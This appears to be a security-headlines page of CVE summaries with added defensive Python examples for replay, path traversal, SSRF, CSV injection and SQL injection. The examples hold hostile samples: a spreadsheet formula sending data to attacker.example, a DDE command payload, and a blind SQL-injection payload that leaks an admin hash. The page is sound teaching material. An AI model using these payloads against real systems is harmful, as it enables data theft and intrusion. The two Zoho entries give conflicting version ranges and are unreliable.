Security Headlines

Headline

CVE-2021-37414: Vulnerability: Improper Authorization Handling

Zoho ManageEngine DesktopCentral version 10.1.2119.7 and prior allows anyone to get a valid user’s APIKEY without authentication.


Related news

CVE-2021-35053: List of Advisories

Possible system denial of service through arbitrary changes to Firefox browser parameters. An attacker could modify a specific Firefox browser parameters file in a certain way and then reboot the system to make it unbootable.

CVE-2021-30816: About the security content of iOS 15 and iPadOS 15

The issue was addressed with improved permissions logic. This issue is fixed in iOS 15 and iPadOS 15. An attacker with physical access to a device may be able to see private contact information.

CVE-2020-23058

An issue in the authentication mechanism in Nong Ge File Explorer v1.4 allows unauthenticated access to sensitive data.

Canopy Parental Control App Wide Open to Unpatched XSS Bugs

The possible cyberattacks include disabling monitoring, location-tracking of children and malicious redirects of parent-console users.

Google to Enable Two-Factor Authentication for 150M More Users

The company also provided guidance on how to protect information stored in inactive accounts.

CVE-2021-39889: HackerOne

In all versions of GitLab EE since version 14.1, due to an insecure direct object reference vulnerability, an endpoint may reveal the protected branch name to a malicious user who makes a crafted API call with the ID of the protected branch.

CVE-2021-23857: Multiple vulnerabilities in Rexroth IndraMotion and IndraLogic series

Login with hash: The login routine allows the client to log in to the system not by using the password, but by using the hash of the password. Combined with CVE-2021-23858, this allows an attacker to subsequently log in to the system.
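Added illustration of the design flaw behind this entry (example code, not Rexroth's login routine; the user name, password, salt and verifier scheme are constructed). When the server accepts hash(password) in place of the password, the hash is a password-equivalent: anyone who captures or otherwise obtains it logs in without the password. The hardened variant below binds each login to a single-use server nonce, so a captured response cannot be replayed. Whatever the companion issue CVE-2021-23858 provides, note that the stored verifier is still enough to answer challenges, so the server must never disclose it; challenge-response stops replay, not disclosure.

```python
import hashlib
import hmac
import secrets

PASSWORD = "correct horse battery staple"   # constructed test credential
SALT = b"constructed-per-user-salt"         # constructed; use a random salt per user

# --- Vulnerable design, as described in the advisory: the client sends
# hash(password) and the server compares it to what it stores. The hash is
# therefore a password-equivalent: whoever learns it (from a capture or a
# disclosure bug) logs in without ever knowing the password.
WEAK_DB = {"operator": hashlib.sha256(PASSWORD.encode()).digest()}

def login_with_hash(user: str, presented_hash: bytes) -> bool:
    stored = WEAK_DB.get(user)
    return stored is not None and hmac.compare_digest(stored, presented_hash)

# --- Hardened design: a salted, iterated verifier plus a per-attempt nonce.
# The client proves it can compute HMAC(verifier, nonce); the nonce is single
# use, so a captured response is useless for the next login.
def derive_verifier(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000)

STRONG_DB = {"operator": derive_verifier(PASSWORD)}

class ChallengeServer:
    def __init__(self) -> None:
        self._pending: dict[str, bytes] = {}

    def challenge(self, user: str) -> bytes:
        nonce = secrets.token_bytes(16)
        self._pending[user] = nonce
        return nonce

    def verify(self, user: str, response: bytes) -> bool:
        nonce = self._pending.pop(user, None)   # single use: gone after first check
        verifier = STRONG_DB.get(user)
        if nonce is None or verifier is None:
            return False
        expected = hmac.new(verifier, nonce, "sha256").digest()
        return hmac.compare_digest(expected, response)

def client_response(password: str, nonce: bytes) -> bytes:
    return hmac.new(derive_verifier(password), nonce, "sha256").digest()

def replay_attack_succeeds() -> bool:
    """A previously captured hash logs in to the weak server: hash == password."""
    captured = hashlib.sha256(PASSWORD.encode()).digest()   # sniffed earlier
    return login_with_hash("operator", captured)

def replay_attack_against_challenge() -> bool:
    """A response captured from one session is rejected in a second session."""
    srv = ChallengeServer()
    captured = client_response(PASSWORD, srv.challenge("operator"))
    assert srv.verify("operator", captured)     # the legitimate session succeeds
    srv.challenge("operator")                   # a new attempt gets a new nonce
    return srv.verify("operator", captured)     # replay of the old response: False
```

The two helper functions return the outcome of each attack so the contrast is testable: the hash-based login accepts the captured value, the challenge-based login rejects it.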

1Password and Fastmail Partner to Boost Online Privacy

Allows users to securely generate unique email aliases, adding an extra layer of online privacy.

CVE-2021-20034: Security Advisory

An improper access control vulnerability in SMA100 allows a remote unauthenticated attacker to bypass the path traversal checks and delete an arbitrary file potentially resulting in a reboot to factory default settings.
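Added example of the check this class of bug needs (hypothetical helper, not the SMA100's code; the directory layout and file names are constructed). A traversal filter that inspects the raw request string is what gets bypassed; the containment test has to be made on the path the OS will actually open, after `..` components and symlinks are resolved, and only then may the file be deleted.

```python
import os
import tempfile

def is_within(base: str, candidate: str) -> bool:
    """True if candidate (already resolved) is base itself or lies below it."""
    return candidate == base or candidate.startswith(base + os.sep)

def safe_delete(base_dir: str, user_path: str) -> bool:
    """Delete user_path only if it resolves to a regular file inside base_dir.
    Hypothetical helper for the example. Returns True only on deletion."""
    base = os.path.realpath(base_dir)
    # realpath collapses '..' and follows symlinks, so the containment test is
    # made on what the OS would open, not on the string the client sent.
    target = os.path.realpath(os.path.join(base, user_path))
    if not is_within(base, target) or not os.path.isfile(target):
        return False
    os.remove(target)
    return True

def naive_check(user_path: str) -> bool:
    """The substring test many implementations rely on; it inspects the raw
    string, so encoded or symlinked input walks past it."""
    return ".." not in user_path

def demo() -> dict:
    """Exercise both checks against a constructed directory; returns results."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "uploads")
        os.mkdir(uploads)
        inside = os.path.join(uploads, "report.txt")
        outside = os.path.join(root, "config.db")       # stands in for a system file
        for p in (inside, outside):
            with open(p, "w") as f:
                f.write("constructed content\n")
        os.symlink(outside, os.path.join(uploads, "link"))  # symlink escape attempt

        results["plain_delete"] = safe_delete(uploads, "report.txt")
        results["dotdot_refused"] = not safe_delete(uploads, "../config.db")
        results["symlink_refused"] = not safe_delete(uploads, "link")
        results["absolute_refused"] = not safe_delete(uploads, outside)
        results["outside_survives"] = os.path.exists(outside)
        # the naive filter passes a URL-encoded '..' that the server decodes later
        results["naive_passes_encoded"] = naive_check("%2e%2e/config.db")
    return results
```

The `base + os.sep` comparison matters: a plain prefix test would accept `/data2/x` as inside `/data`.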

CVE-2021-41011: HackerOne

LINE client for iOS before 11.15.0 might expose authentication information for a certain service to external entities under certain conditions. This is usually impossible, but in combination with a server-side bug, attackers could get this information.

CVE-2021-39339: Vulnerability Advisories - Wordfence

The Telefication WordPress plugin is vulnerable to Open Proxy and Server-Side Request Forgery via the ~/bypass.php file due to a user-supplied URL request value that is fetched by a curl request. This affects versions up to, and including, 1.8.0.
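Added example of the guard a server-side fetcher needs before it hands a user-supplied URL to curl (hypothetical code, not the plugin's; the host-to-address table is constructed so the example runs offline). The check restricts the scheme, rejects userinfo, resolves the host, and refuses loopback, private, link-local and other non-public addresses, which is what turns an open proxy into a fetcher that can only reach the public internet.

```python
import ipaddress
import socket
from typing import Callable, Optional
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

# Constructed resolver so the example runs offline; a real deployment would
# use socket.getaddrinfo and check every returned address.
FAKE_DNS = {
    "api.example.com": "93.184.216.34",
    "intranet.corp":   "10.0.0.5",
    "localhost":       "127.0.0.1",
}

def fake_resolve(host: str) -> str:
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    ipaddress.ip_address(host)   # raises ValueError for unknown non-literal hosts
    return host                  # an IP literal resolves to itself

def is_public_address(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)

def validate_outbound_url(url: str,
                          resolve: Callable[[str], str] = socket.gethostbyname) -> Optional[str]:
    """Return the IP the fetcher may connect to, or None if the URL is refused."""
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:        # no file://, gopher://, dict://
        return None
    if not parts.hostname or parts.username or parts.password:
        return None                                # http://trusted@evil confusion
    try:
        ip = resolve(parts.hostname)
    except (OSError, ValueError):
        return None
    if not is_public_address(ip):
        return None
    return ip
```

Connect to the returned address with the Host header set from the URL rather than resolving the name a second time, otherwise a DNS answer that changes between check and fetch (rebinding) bypasses the check; redirects must either be disabled or re-validated per hop for the same reason.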

CVE-2021-41390: Ericsson ECM (Enterprise Content Management) solution Vulnerable to CSV Injection

In Ericsson ECM before 18.0, it was observed that the Security Provider Endpoint in the User Profile Management section is vulnerable to CSV Injection.
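Added example of the export-side mitigation for CSV injection (example code, not Ericsson's; the profile rows, including the attacker-controlled names, are constructed). A value that begins with `=`, `+`, `-`, `@`, tab or carriage return is interpreted as a formula when the exported file is opened in a spreadsheet; prefixing such cells with an apostrophe forces text interpretation, and quoting every field keeps embedded separators inside the cell.

```python
import csv
import io

# Characters that make a spreadsheet interpret a cell as a formula when the
# CSV is opened in Excel or LibreOffice; tab and CR can also split a cell.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

def neutralize_cell(value: str) -> str:
    """Prefix a formula-like cell with an apostrophe so it is imported as text."""
    if value.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value

def export_csv(rows: list, fieldnames: list) -> str:
    """Write rows with every field quoted and neutralized."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames,
                            quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(str(row.get(k, ""))) for k in fieldnames})
    return buf.getvalue()

# Constructed user-profile rows: the second and third "name" values are
# payloads a user could store in a profile field and have an administrator
# export and open.
SAMPLE_ROWS = [
    {"name": "Alice Example", "email": "alice@example.com"},
    {"name": '=HYPERLINK("http://attacker.example/?"&A1,"open")', "email": "x@example.com"},
    {"name": "@SUM(1+1)*cmd|' /C calc'!A0", "email": "y@example.com"},
]

def exported_names(csv_text: str) -> list:
    """Read the export back as a CSV consumer would and return the name column."""
    return [r["name"] for r in csv.DictReader(io.StringIO(csv_text))]
```

Two caveats: genuinely numeric columns should be emitted as numbers by a typed export rather than passed through this string filter (a string "-5" gets an apostrophe too), and the apostrophe is visible in some consumers, so rejecting formula-like input at the point it is stored is the complementary control.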

CVE-2021-41391: Ericsson ECM (Enterprise Content Management) solution Vulnerable to Stored XSS.

In Ericsson ECM before 18.0, it was observed that the Security Management Endpoint in the User Profile Management section is vulnerable to stored XSS via a name, leading to session hijacking and full account takeover.

CVE-2021-37414: Vulnerability: Improper Authorization Handling

Zoho ManageEngine DesktopCentral before 10.0.709 allows anyone to get a valid user's APIKEY without authentication.

CVE-2021-38324: Vulnerability Advisories - Wordfence

The SP Rental Manager WordPress plugin is vulnerable to SQL Injection via the orderby parameter found in the ~/user/shortcodes.php file which allows attackers to retrieve information contained in a site's database, in versions up to and including 1.5.3.
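Added example of why an ORDER BY parameter is a distinct injection sink and how it is fixed (example code, not the plugin's; the schema, rows and the admin hash value are constructed, using SQLite in memory). A sort column cannot be passed as a bound parameter, so concatenation is the tempting route; the payload below turns the sort order into a boolean oracle on data from another table, which is exactly the "retrieve information contained in a site's database" outcome the advisory describes. The safe variant maps the request value onto an allowlist of column names instead.

```python
import sqlite3

ALLOWED_ORDER_COLUMNS = {"name", "price", "created_at"}

def setup() -> sqlite3.Connection:
    """Constructed schema standing in for a site database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE rentals (name TEXT, price REAL, created_at TEXT)")
    con.execute("CREATE TABLE wp_users (user_login TEXT, user_pass TEXT)")
    con.executemany("INSERT INTO rentals VALUES (?, ?, ?)",
                    [("cabin", 450.0, "2021-01-01"), ("villa", 120.0, "2021-02-01")])
    con.execute("INSERT INTO wp_users VALUES ('admin', '$P$Bconstructed.hash.value')")
    return con

def list_rentals_vulnerable(con, orderby: str) -> list:
    # The shape of the bug: the request parameter concatenated into ORDER BY.
    return con.execute(f"SELECT name FROM rentals ORDER BY {orderby}").fetchall()

def list_rentals_safe(con, orderby: str, descending: bool = False) -> list:
    # ORDER BY cannot be a bound parameter, so map the input onto an allowlist
    # and fall back to a fixed column rather than echoing the request value.
    column = orderby if orderby in ALLOWED_ORDER_COLUMNS else "name"
    direction = "DESC" if descending else "ASC"
    return con.execute(f"SELECT name FROM rentals ORDER BY {column} {direction}").fetchall()

def blind_oracle_payload(guess: str) -> str:
    """Boolean-based blind payload: sort by price when the guess about the first
    character of the admin hash is right, by name when it is wrong. Repeating
    this per position leaks the whole column one character at a time."""
    return ("(CASE WHEN (SELECT substr(user_pass, 1, 1) FROM wp_users "
            f"WHERE user_login = 'admin') = '{guess}' THEN price ELSE name END)")

def first_row_name(rows: list) -> str:
    return rows[0][0]
```

With the constructed data, sorting by price puts "villa" first and sorting by name puts "cabin" first, so the first row of the response tells the attacker whether the guess was correct.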

CVE-2021-30875: About the security content of iOS 15.1 and iPadOS 15.1

A lock screen issue allowed access to contacts on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 15.1 and iPadOS 15.1. A local attacker may be able to view contacts from the lock screen.

CVE-2021-30884: About the security content of iOS 15 and iPadOS 15

The issue was resolved with additional restrictions on CSS compositing. This issue is fixed in tvOS 15, watchOS 8, iOS 15 and iPadOS 15. Visiting a maliciously crafted website may reveal a user's browsing history.

CVE-2021-30867: About the security content of iOS 15 and iPadOS 15

The issue was addressed with improved authentication. This issue is fixed in iOS 15 and iPadOS 15. A malicious application may be able to access photo metadata without needing permission to access photos.

CVE-2021-30918: About the security content of iOS 14.8.1 and iPadOS 14.8.1

A Lock Screen issue was addressed with improved state management. This issue is fixed in iOS 14.8.1 and iPadOS 14.8.1, iOS 15.0.1 and iPadOS 15.0.1. A user may be able to view restricted content from the Lock Screen.

CVE-2021-39365: (CVE-2021-39365) Missing TLS certificate verification (#146) · Issues · GNOME / grilo · GitLab

In GNOME grilo through 0.3.13, grl-net-wc.c does not enable TLS certificate verification on the SoupSessionAsync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.

CVE-2021-39360: Reminder: SoupSessionSync and SoupSessionAsync default to no TLS certificate verification – Michael Catanzaro's Blog

In GNOME libzapojit through 0.0.3, zpj-skydrive.c does not enable TLS certificate verification on the SoupSessionSync objects it creates, leaving users vulnerable to network MITM attacks. NOTE: this is similar to CVE-2016-20011.

CVE-2019-5452: HackerOne

Bypass of lock protection in the Nextcloud Android app prior to version 3.6.2 causes thumbnails to be leaked when the Android content provider is queried, even though the lock protection had not been unlocked.

CVE-2019-5451: HackerOne

Bypass of lock protection in the Nextcloud Android app prior to version 3.6.1 allows access to files when the app is repeatedly opened and closed in a very short time.
